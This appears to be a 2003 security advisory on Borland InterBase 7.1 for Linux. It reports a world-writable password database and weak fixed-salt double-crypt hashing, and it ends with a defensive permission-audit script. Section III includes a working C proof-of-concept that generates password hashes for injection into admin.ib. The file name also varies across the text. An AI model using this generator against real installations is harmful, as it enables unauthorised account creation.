======Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash======

//November 26, 2003//

**I. BACKGROUND**

Excerpt from http://www.borland.com/interbase

"Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance."

**II. DESCRIPTION**

The "information database" stored in the file admin4.pcb is readable and writable by all users with local access to the system.

<code>
[root@Fester interbase]# ls -l /opt/interbase/admin.ib
-rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib
</code>

Not only is the password file readable and writable by all local users, but the password hash is computed with one salt, "9z", and then hashed again. In addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash without the salt. The purpose of the salt is to ensure that the same passwords don't always have the same hashes. With the salt removed, the hashes will always be the same for the same password, regardless of crypt() being called twice.

This can be expressed in this line of pseudo-C: ''crypt(&crypt(user_password,"9z")[2],"9z")''

**III. ANALYSIS**

Local attackers can exploit this vulnerability to add or modify accounts in InterBase. The following C program will generate hashed passwords that can be injected into the admin.ib database.
<code c>
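/* Larry W. Cashdollar
   Vapid Labs.
   Borland Interbase 7.1 password creator. lwc@vapid.dhs.org
   Link with -lcrypt. */

#define _XOPEN_SOURCE   /* expose crypt() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SALT "9z"

int main (int argc, char *argv[]) {

    char first[14];     /* 13-character crypt() result plus NUL */
    char *crypt1, *crypt2;

    if (argc < 2) {
        printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");
        exit(1);
    }

    /* First pass: hash the password with the fixed salt. */
    crypt1 = crypt (argv[1], SALT);
    if (crypt1 == NULL) {
        perror ("crypt");
        exit(1);
    }
    /* crypt() returns a static buffer; copy the result before the second call. */
    strncpy (first, crypt1, sizeof(first) - 1);
    first[sizeof(first) - 1] = '\0';

    /* Second pass: skip the 2-character salt prefix and hash again. */
    crypt2 = crypt (&first[2], SALT);
    if (crypt2 == NULL) {
        perror ("crypt");
        exit(1);
    }

    printf ("Double crypt() is: %s\n", crypt2);
    printf ("Without salt (as stored in isc4.gdb/admin.ib): %s\n", &crypt2[2]);
    return(0);

}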
</code>

**IV. DETECTION**

It appears all 7.x versions of Borland InterBase for Linux are affected.

http://www.borland.com/interbase/

**V. WORKAROUND**

Set the permissions on the admin.ib file to a more restrictive setting.
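
One way to check for and apply this workaround, as an added example that is not part of the original advisory. The function names ''audit_pwfile'' and ''restrict_pwfile'' are hypothetical, and the script assumes the InterBase server runs as the file's owner, so owner-only access is enough.

```shell
#!/bin/sh
# Added example (not from the advisory): audit the mode of a password
# database such as /opt/interbase/admin.ib and remove group/other access.
# Function names are hypothetical. Assumes the server runs as the file owner.

# Report who can touch the file.
# Returns 0 if only the owner has access, 1 if group/other do, 2 if missing.
audit_pwfile() {
    f=$1
    if [ ! -e "$f" ]; then
        echo "MISSING  $f"
        return 2
    fi
    mode=$(ls -ld -- "$f" | cut -c1-10)          # e.g. -rw-rw-rw-
    group=$(printf '%s' "$mode" | cut -c5-7)     # group rwx bits
    other=$(printf '%s' "$mode" | cut -c8-10)    # other rwx bits
    status=0
    case $other in
        ?w?) echo "CRITICAL $mode $f: any local user can modify account records"
             status=1 ;;
    esac
    case $other in
        r??) echo "HIGH     $mode $f: any local user can read the password hashes"
             status=1 ;;
    esac
    case $group in
        ---) ;;
        *)   echo "REVIEW   $mode $f: group access granted, check group membership"
             status=1 ;;
    esac
    if [ "$status" -eq 0 ]; then
        echo "OK       $mode $f"
    fi
    return "$status"
}

# Remove all group and other permissions, leaving the owner bits unchanged.
restrict_pwfile() {
    chmod go-rwx -- "$1"
}

# Audit every path given on the command line, e.g. /opt/interbase/admin.ib
for f in "$@"; do
    audit_pwfile "$f" || true
done
```

Run the audit again after ''restrict_pwfile'' and confirm the server still starts, since a server running under a different account than the file owner would lose access.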

**VI. VENDOR FIX**

Notified by iDEFENSE.

**VII. CVE INFORMATION**

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has not assigned an identification number to this issue.

**VIII. CREDIT**

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.